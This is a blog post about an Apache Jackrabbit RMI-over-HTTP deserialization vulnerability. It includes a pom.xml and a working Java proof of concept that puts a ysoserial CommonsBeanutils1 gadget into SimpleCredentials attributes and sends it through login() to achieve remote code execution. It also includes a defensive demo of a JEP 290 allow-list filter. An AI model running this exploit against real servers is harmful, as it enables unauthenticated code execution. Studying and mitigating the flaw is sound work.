Note
This post was last updated on 2023-07-28; its contents may be out of date.
Advisory thread: https://lists.apache.org/thread/j03b3qdhborc2jrhdc4d765d3jkh8bfw
The vulnerable spot is already named there: RMI over HTTP, exposed by
org.apache.jackrabbit.servlet.remote.RemoteBindingServlet
The question is how to exploit it. According to the documentation at https://jackrabbit.apache.org/archive/wiki/JCR/RemoteAccess_115513494.html, JcrUtils can be used to obtain a Repository; given an http URL, what you get back is a URLRemoteRepository.
The Repository interface has a handful of methods; among them, login() takes a javax.jcr.Credentials.
That interface has two implementations in the JCR API (SimpleCredentials and GuestCredentials).
SimpleCredentials carries an attribute map of type HashMap<String, Object> (filled through setAttribute).
So a serialized CommonsBeanutils (cb) gadget chain can be placed into that map and sent along with the login call; the server has to deserialize the whole Credentials object, attribute map included, before it can look at the user ID or password.
Add the dependencies to pom.xml (ysoserial, which provides CommonsBeanutils1 for the PoC below, is not in this pom and must be put on the classpath separately):

```xml
<dependencies>
    <dependency>
        <groupId>javax.jcr</groupId>
        <artifactId>jcr</artifactId>
        <version>2.0</version>
    </dependency>
    <!-- https://mvnrepository.com/artifact/org.apache.jackrabbit/jackrabbit-jcr-rmi -->
    <dependency>
        <groupId>org.apache.jackrabbit</groupId>
        <artifactId>jackrabbit-jcr-rmi</artifactId>
        <version>2.21.10</version>
    </dependency>
    <dependency>
        <groupId>org.apache.jackrabbit</groupId>
        <artifactId>jackrabbit-jcr2dav</artifactId>
        <version>2.0-beta6</version>
    </dependency>
    <dependency>
        <groupId>org.slf4j</groupId>
        <artifactId>slf4j-simple</artifactId>
        <version>1.5.8</version>
    </dependency>
</dependencies>
```
Build the deserialization payload and send it:

```java
package org.example;

import org.apache.jackrabbit.commons.JcrUtils;
import ysoserial.payloads.CommonsBeanutils1;

import javax.jcr.Repository;
import javax.jcr.SimpleCredentials;

public class Main {
    public static void main(String[] args) throws Exception {
        // user ID and password do not matter: the server must deserialize the
        // Credentials object (attribute map included) before it can check them
        SimpleCredentials simpleCredentials = new SimpleCredentials("1", "1".toCharArray());
        // the attribute map is HashMap<String, Object>, so any Serializable gadget chain fits
        simpleCredentials.setAttribute("a", new CommonsBeanutils1().getObject("calc"));
        // an http URL yields a URLRemoteRepository backed by the RemoteBindingServlet
        Repository repository = JcrUtils.getRepository("http://localhost:8080/rmi");
        // login() marshals the credentials to the server, which deserializes them
        repository.login(simpleCredentials);
    }
}
```
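To see why the attribute map is the carrier, and what stops it, here is an added example (not code from the post or from Jackrabbit) that serializes a SimpleCredentials the same way the PoC does, but with a constructed stand-in gadget (`Probe`, whose readObject just records that it ran) instead of the ysoserial chain. It then deserializes the bytes twice: once with a plain ObjectInputStream, which models the unfiltered unmarshalling on the vulnerable side and lets the attribute's readObject run, and once with a JEP 290 allow-list filter that only admits the classes a legitimate SimpleCredentials needs, which rejects the attribute before it is instantiated. It assumes the javax.jcr:jcr:2.0 dependency from the pom above and Java 9 or later (for ObjectInputFilter); the class and attribute names are arbitrary.

```java
package org.example;

import javax.jcr.SimpleCredentials;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;

public class CredentialsGadgetDemo {

    // Constructed stand-in for a gadget: any Serializable whose readObject has
    // side effects. A real chain (e.g. CommonsBeanutils1) starts executing here.
    static final class Probe implements Serializable {
        private static final long serialVersionUID = 1L;
        static volatile boolean deserialized = false;

        private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
            in.defaultReadObject();
            deserialized = true;
        }
    }

    // Same bytes that RMI marshals for the login() argument: the whole
    // SimpleCredentials object graph, attribute map included.
    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    // Unfiltered: what a plain ObjectInputStream does with the attribute map.
    static Object deserializeUnfiltered(byte[] bytes) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            return ois.readObject();
        }
    }

    // Filtered: allow only the classes a genuine SimpleCredentials contains
    // (the credentials object, its HashMap, String keys; char[] passes because its
    // component type is primitive) and reject everything else before instantiation.
    static Object deserializeFiltered(byte[] bytes) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            ois.setObjectInputFilter(ObjectInputFilter.Config.createFilter(
                    "javax.jcr.SimpleCredentials;java.util.HashMap;java.lang.String;!*"));
            return ois.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        SimpleCredentials creds = new SimpleCredentials("1", "1".toCharArray());
        creds.setAttribute("a", new Probe());          // attribute slot the PoC abuses
        byte[] wire = serialize(creds);

        deserializeUnfiltered(wire);
        System.out.println("unfiltered: Probe.readObject ran = " + Probe.deserialized);

        Probe.deserialized = false;
        try {
            deserializeFiltered(wire);
        } catch (InvalidClassException e) {
            System.out.println("filtered: rejected (" + e.getMessage() + ")");
        }
        System.out.println("filtered:   Probe.readObject ran = " + Probe.deserialized);
    }
}
```

The first run reports `true`: the HashMap's readObject reconstructs each value, so the attribute's readObject executes with no authentication involved. The second reports `false`, because the filter is consulted on the class descriptor before any instance is created. The same allow-list can be applied process-wide with `-Djdk.serialFilter=...`, which also covers RMI's own unmarshalling; the filter here only models that defence, and the advisory thread linked at the top is the place to look for the actual fix and the affected versions.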
RCE achieved; kept here for the record.
My writing is poor, my wording flippant, the content shallow and my technique clumsy. Pointers and corrections from the masters are welcome and much appreciated.